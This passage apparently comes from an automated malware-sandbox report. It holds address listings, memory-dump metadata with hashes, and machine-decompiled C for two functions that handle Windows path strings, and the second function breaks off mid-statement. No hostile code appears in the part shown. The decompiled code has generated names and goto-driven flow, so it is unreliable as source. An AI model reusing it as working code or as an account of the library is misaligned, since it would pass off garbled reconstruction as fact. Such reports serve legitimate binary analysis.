                                                        0x049660ba
                                                        0x049660be
                                                        0x049660c0
                                                        0x049660c5
                                                        0x049660c5
                                                        0x049660c5
                                                        0x049660c6
                                                        0x049660cd
                                                        0x04966114
                                                        0x049660cf
                                                        0x049660cf
                                                        0x049660d4
                                                        0x049660d5
                                                        0x049660da
                                                        0x049660db
                                                        0x049660e1
                                                        0x049660e2
                                                        0x049660e8
                                                        0x049660f8
                                                        0x049660fd
                                                        0x049660fe
                                                        0x04966102
                                                        0x04966104
                                                        0x04966107
                                                        0x04966109
                                                        0x0496610b
                                                        0x0496610b
                                                        0x0496610b
                                                        0x0496610b
                                                        0x0496610f
                                                        0x0496610f
                                                        0x04966117
                                                        0x0496611a
                                                        0x0496611f
                                                        0x04966125
                                                        0x04966134
                                                        0x04966139
                                                        0x0496613f
                                                        0x04966146
                                                        0x04966148
                                                        0x0496614b
                                                        0x0496614d
                                                        0x0496614f
                                                        0x0496614f
                                                        0x0496614f
                                                        0x0496614f
                                                        0x04966153
                                                        0x04966159
                                                        0x04966159
                                                        0x0496615c
                                                        0x04966163
                                                        0x04966169
                                                        0x0496616c
                                                        0x04966172
                                                        0x04966181
                                                        0x04966186
                                                        0x04966187
                                                        0x0496618b
                                                        0x04966191
                                                        0x04966195
                                                        0x049661a3
                                                        0x049661bb
                                                        0x049661c0
                                                        0x049661c3
                                                        0x049661cc
                                                        0x049661d0
                                                        0x049661dc
                                                        0x049661de
                                                        0x049661e1
                                                        0x049661e4
                                                        0x049661e6
                                                        0x049661e8
                                                        0x049661e8
                                                        0x049661e8
                                                        0x049661e8
                                                        0x049661e6
                                                        0x049661ec
                                                        0x049661f3
                                                        0x04966203
                                                        0x04966209
                                                        0x0496620a
                                                        0x04966216
                                                        0x0496621d
                                                        0x04966227
                                                        0x04966241
                                                        0x04966246
                                                        0x0496624c
                                                        0x04966257
                                                        0x04966259
                                                        0x0496625c
                                                        0x0496625e
                                                        0x04966260
                                                        0x04966260
                                                        0x04966260
                                                        0x04966260
                                                        0x0496625e
                                                        0x04966264
                                                        0x04966267
                                                        0x04966269
                                                        0x04966315
                                                        0x04966315
                                                        0x0496631b
                                                        0x0496631e
                                                        0x04966324
                                                        0x04966327
                                                        0x0496632f
                                                        0x04966330
                                                        0x04966333
                                                        0x0496633a
                                                        0x0496633c
                                                        0x04966335
                                                        0x04966335
                                                        0x04966335
                                                        0x0496633f
                                                        0x04966342
                                                        0x0496634c
                                                        0x04966352
                                                        0x04966355
                                                        0x04966355
                                                        0x04966359
                                                        0x00000000
                                                        0x0496626f
                                                        0x04966275
                                                        0x04966275
                                                        0x04966278
                                                        0x0496627e
                                                        0x0496627e
                                                        0x04966281
                                                        0x04966287
                                                        0x0496628d
                                                        0x04966298
                                                        0x0496629c
                                                        0x049662a2
                                                        0x0496629e
                                                        0x0496629e
                                                        0x0496629e
                                                        0x049662a7
                                                        0x049662a7
                                                        0x049662aa
                                                        0x049662b0
                                                        0x049662f0
                                                        0x049662f0
                                                        0x049662f2
                                                        0x049662f8
                                                        0x049662fd
                                                        0x049662b2
                                                        0x049662b2
                                                        0x049662b2
                                                        0x049662b5
                                                        0x049662dd
                                                        0x049662e2
                                                        0x049662e5
                                                        0x049662b7
                                                        0x049662b8
                                                        0x049662bb
                                                        0x049662bd
                                                        0x049662c0
                                                        0x049662c4
                                                        0x049662cd
                                                        0x049662cd
                                                        0x049662c0
                                                        0x049662bb
                                                        0x049662b5
                                                        0x04966302
                                                        0x04966303
                                                        0x04966305
                                                        0x04966305
                                                        0x04966305
                                                        0x0496630c
                                                        0x0496630c
                                                        0x00000000
                                                        0x0496627e
                                                        0x04966269
                                                        0x04965eac
                                                        0x04965ebb
                                                        0x04965ebe
                                                        0x04965ecb
                                                        0x04965ecb
                                                        0x04965ece
                                                        0x04965ece
                                                        0x04965ed4
                                                        0x04965ed7
                                                        0x04965ed9
                                                        0x04965edb
                                                        0x04965edb
                                                        0x04965ee1
                                                        0x04965ee1
                                                        0x04965ee3
                                                        0x04965f20
                                                        0x04965f20
                                                        0x04965ee5
                                                        0x04965ee5
                                                        0x04965ee5
                                                        0x04965ee8
                                                        0x04965f11
                                                        0x04965f18
                                                        0x04965eea
                                                        0x04965eea
                                                        0x04965eed
                                                        0x04965ef2
                                                        0x04965ef8
                                                        0x04965efb
                                                        0x04965f0a
                                                        0x04965f0a
                                                        0x04965eed
                                                        0x04965ee8
                                                        0x04965f22
                                                        0x04965f28
                                                        0x00000000
                                                        0x00000000
                                                        0x04965f30
                                                        0x04965f31
                                                        0x04965f37
                                                        0x04965f3a
                                                        0x04965f3d
                                                        0x04965f44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04965f46
                                                        0x04965f48
                                                        0x04965f4d
                                                        0x00000000
                                                        0x04965f4d
                                                        0x04965dda
                                                        0x04965ddf
                                                        0x00000000
                                                        0x04965ddf
                                                        0x04965dd8
                                                        0x04965da7
                                                        0x04965da9
                                                        0x04965dac
                                                        0x04965dae
                                                        0x00000000
                                                        0x04965db4
                                                        0x04965db4
                                                        0x00000000
                                                        0x04965db4
                                                        0x04965dae
                                                        0x04965d88
                                                        0x04965d8d
                                                        0x04966363
                                                        0x04966369
                                                        0x0496636a
                                                        0x04966370
                                                        0x04966372
                                                        0x0496637a
                                                        0x0496637b
                                                        0x0496637d
                                                        0x00000000
                                                        0x00000000
                                                        0x0496637f
                                                        0x04966385
                                                        0x00000000
                                                        0x04966385
                                                        0x04965d38
                                                        0x04965d3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04965d3b
                                                        0x04965d27
                                                        0x04965d29
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04966360
                                                        0x00000000
                                                        0x04966360
                                                        0x04965c10
                                                        0x04965c10
                                                        0x049663da
                                                        0x049663e5
                                                        0x049663e5

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e82cb633e3197e068b0a570b054ee62505dba84157ff40b72eb886a62e9eb3c
                                                        • Instruction ID: 9e6d7d941e4f6f916a5a95cf0f66e0061fba325b91526a31201fb2b8d72d5e12
                                                        • Opcode Fuzzy Hash: 7e82cb633e3197e068b0a570b054ee62505dba84157ff40b72eb886a62e9eb3c
                                                        • Instruction Fuzzy Hash: A9428D71A00229DFDB24CF68C880BA9B7B5FF45304F1585AAD94EEB241E774AD85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048B4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E048B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x498d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E048CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E048B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L048B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E048B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M048B45F8))) {
												case 0:
													_v568 = 0x4871078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x48711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L048B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E048DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E048DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E048952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E048AEB70(1, 0x49879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E048AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E048D95D0();
																			L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E048DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E048D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E048DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                        0x048b4128
                                                        0x048b4135
                                                        0x048b413c
                                                        0x048b4141
                                                        0x048b4145
                                                        0x048b4147
                                                        0x048b414e
                                                        0x048b4151
                                                        0x048b4159
                                                        0x048b415c
                                                        0x048b4160
                                                        0x048b4164
                                                        0x048b4168
                                                        0x048b416c
                                                        0x048b417f
                                                        0x048b4181
                                                        0x048b446a
                                                        0x048b446a
                                                        0x048b418c
                                                        0x048b4195
                                                        0x048b4199
                                                        0x048b4432
                                                        0x048b4439
                                                        0x048b443d
                                                        0x048b4442
                                                        0x048b4447
                                                        0x00000000
                                                        0x048b419f
                                                        0x048b41a3
                                                        0x048b41b1
                                                        0x048b41b9
                                                        0x048b41bd
                                                        0x048b45db
                                                        0x048b45db
                                                        0x00000000
                                                        0x048b41c3
                                                        0x048b41c3
                                                        0x048b41ce
                                                        0x048b41d4
                                                        0x048fe138
                                                        0x048fe13e
                                                        0x048fe169
                                                        0x048fe16d
                                                        0x048fe19e
                                                        0x048fe16f
                                                        0x048fe16f
                                                        0x048fe175
                                                        0x048fe179
                                                        0x048fe18f
                                                        0x048fe193
                                                        0x00000000
                                                        0x048fe199
                                                        0x00000000
                                                        0x048fe199
                                                        0x048fe193
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b41da
                                                        0x048b41da
                                                        0x048b41df
                                                        0x048b41e4
                                                        0x048b41ec
                                                        0x048b4203
                                                        0x048b4207
                                                        0x048fe1fd
                                                        0x048b4222
                                                        0x048b4226
                                                        0x048fe1f3
                                                        0x048fe1f3
                                                        0x048b422c
                                                        0x048b422c
                                                        0x048b4233
                                                        0x048fe1ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b4239
                                                        0x048b4239
                                                        0x048b4239
                                                        0x048b4239
                                                        0x048b4233
                                                        0x048b4226
                                                        0x048b41ee
                                                        0x048b41ee
                                                        0x048b41f4
                                                        0x048b4575
                                                        0x048fe1b1
                                                        0x048fe1b1
                                                        0x00000000
                                                        0x048b457b
                                                        0x048b457b
                                                        0x048b4582
                                                        0x048fe1ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b4588
                                                        0x048b4588
                                                        0x048b458c
                                                        0x048fe1c4
                                                        0x048fe1c4
                                                        0x00000000
                                                        0x048b4592
                                                        0x048b4592
                                                        0x048b4599
                                                        0x048fe1be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b459f
                                                        0x048b459f
                                                        0x048b45a3
                                                        0x048fe1d7
                                                        0x048fe1e4
                                                        0x00000000
                                                        0x048b45a9
                                                        0x048b45a9
                                                        0x048b45b0
                                                        0x048fe1d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b45b6
                                                        0x048b45b6
                                                        0x048b45b6
                                                        0x00000000
                                                        0x048b45b6
                                                        0x048b45b0
                                                        0x048b45a3
                                                        0x048b4599
                                                        0x048b458c
                                                        0x048b4582
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b41f4
                                                        0x048b423e
                                                        0x048b4241
                                                        0x048b45c0
                                                        0x048b45c4
                                                        0x00000000
                                                        0x048b45ca
                                                        0x048b45ca
                                                        0x00000000
                                                        0x048fe207
                                                        0x048fe20f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048b45d1
                                                        0x00000000
                                                        0x00000000
                                                        0x048b45ca
                                                        0x00000000
                                                        0x048b4247
                                                        0x048b4247
                                                        0x048b4247
                                                        0x048b4249
                                                        0x048b4249
                                                        0x048b4249
                                                        0x048b4251
                                                        0x048b4251
                                                        0x048b4257
                                                        0x048b425f
                                                        0x048b426e
                                                        0x048b4270
                                                        0x048b427a
                                                        0x048fe219
                                                        0x048fe219
                                                        0x048b4280
                                                        0x048b4282
                                                        0x048b4456
                                                        0x048b45ea
                                                        0x00000000
                                                        0x048b45f0
                                                        0x048fe223
                                                        0x00000000
                                                        0x048fe223
                                                        0x048b445c
                                                        0x048b445c
                                                        0x00000000
                                                        0x048b445c
                                                        0x00000000
                                                        0x048b4288
                                                        0x048b428c
                                                        0x048fe298
                                                        0x048b4292
                                                        0x048b4292
                                                        0x048b429e
                                                        0x048b42a3
                                                        0x048b42a7
                                                        0x048b42ac
                                                        0x048fe22d
                                                        0x048b42b2
                                                        0x048b42b2
                                                        0x048b42b9
                                                        0x048b42bc
                                                        0x048b42c2
                                                        0x048b42ca
                                                        0x048b42cd
                                                        0x048b42cd
                                                        0x048b42d4
                                                        0x048b433f
                                                        0x048b433f
                                                        0x048b42d6
                                                        0x048b42d6
                                                        0x048b42d9
                                                        0x048b42dd
                                                        0x048b42eb
                                                        0x048fe23a
                                                        0x048b42f1
                                                        0x048b4305
                                                        0x048b430d
                                                        0x048b4315
                                                        0x048b4318
                                                        0x048b431f
                                                        0x048b4322
                                                        0x048b432e
                                                        0x048b433b
                                                        0x048b433b
                                                        0x00000000
                                                        0x048b432e
                                                        0x048b42eb
                                                        0x048b434c
                                                        0x048b434e
                                                        0x048b4352
                                                        0x048b4359
                                                        0x048b435e
                                                        0x048b4361
                                                        0x048b436e
                                                        0x048b438a
                                                        0x048b438e
                                                        0x048b4396
                                                        0x048b439e
                                                        0x048b43a1
                                                        0x048b43ad
                                                        0x048b43bb
                                                        0x048b43bb
                                                        0x048b43ad
                                                        0x048b436e
                                                        0x048b43bf
                                                        0x048b43c5
                                                        0x048b4463
                                                        0x048b4463
                                                        0x048b43ce
                                                        0x048b43d5
                                                        0x048b43d9
                                                        0x048b43df
                                                        0x048b4475
                                                        0x048b4479
                                                        0x048b4491
                                                        0x048b4491
                                                        0x048b4479
                                                        0x048b43e5
                                                        0x048b43eb
                                                        0x048b43f4
                                                        0x048b43f6
                                                        0x048b43f9
                                                        0x048b43fc
                                                        0x048b43ff
                                                        0x048b44e8
                                                        0x048b44ed
                                                        0x048b44f3
                                                        0x048fe247
                                                        0x00000000
                                                        0x048b44f9
                                                        0x048b4504
                                                        0x048b4508
                                                        0x048b450f
                                                        0x048fe269
                                                        0x00000000
                                                        0x048b4515
                                                        0x048b4519
                                                        0x048b4531
                                                        0x048b4534
                                                        0x048b4537
                                                        0x048b453e
                                                        0x048b4541
                                                        0x048b454a
                                                        0x048fe255
                                                        0x048fe255
                                                        0x048fe25b
                                                        0x048fe25e
                                                        0x048fe261
                                                        0x048fe261
                                                        0x048b4555
                                                        0x048b4559
                                                        0x048b455d
                                                        0x048fe26d
                                                        0x048fe270
                                                        0x048fe274
                                                        0x048fe27a
                                                        0x048fe27d
                                                        0x048fe28e
                                                        0x048fe28e
                                                        0x048b4563
                                                        0x048b4563
                                                        0x048b4569
                                                        0x048b4569
                                                        0x00000000
                                                        0x048b455d
                                                        0x048b450f
                                                        0x00000000
                                                        0x048b44f3
                                                        0x048b43ff
                                                        0x048b4405
                                                        0x048b4405
                                                        0x048b4405
                                                        0x048b42ac
                                                        0x048b428c
                                                        0x048b4282
                                                        0x048b4407
                                                        0x048b440d
                                                        0x048fe2af
                                                        0x048fe2af
                                                        0x048b4413
                                                        0x048b4413
                                                        0x00000000
                                                        0x048b41d4
                                                        0x00000000
                                                        0x048b41c3
                                                        0x048b41bd
                                                        0x048b4415
                                                        0x048b4415
                                                        0x048b4416
                                                        0x048b4417
                                                        0x048b4429
                                                        0x048b416e
                                                        0x048b416e
                                                        0x048b4175
                                                        0x048b4498
                                                        0x048b449f
                                                        0x048fe12d
                                                        0x00000000
                                                        0x048fe133
                                                        0x00000000
                                                        0x048fe133
                                                        0x048b44a5
                                                        0x048b44a5
                                                        0x048b44aa
                                                        0x00000000
                                                        0x048b44bb
                                                        0x048b44ca
                                                        0x048b44d6
                                                        0x048b44d7
                                                        0x048b44d8
                                                        0x048b44e3
                                                        0x048b44e3
                                                        0x048b44aa
                                                        0x048b417b
                                                        0x048b417b
                                                        0x048b417b
                                                        0x00000000
                                                        0x048b417b
                                                        0x048b4175
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30e5e506336e9a5b1f61783a24557872ea9a7e5e1deb09110329f5a631395232
                                                        • Instruction ID: 5d38d41f68ea3f70e638f9f27b311b09b7684660af825795edb0900188847c29
                                                        • Opcode Fuzzy Hash: 30e5e506336e9a5b1f61783a24557872ea9a7e5e1deb09110329f5a631395232
                                                        • Instruction Fuzzy Hash: 83F16E706082518FD724CF59C481A7AB7E1AF88B18F144E2EF5C5CB361E734E895DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E048C20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4988714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E048C2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
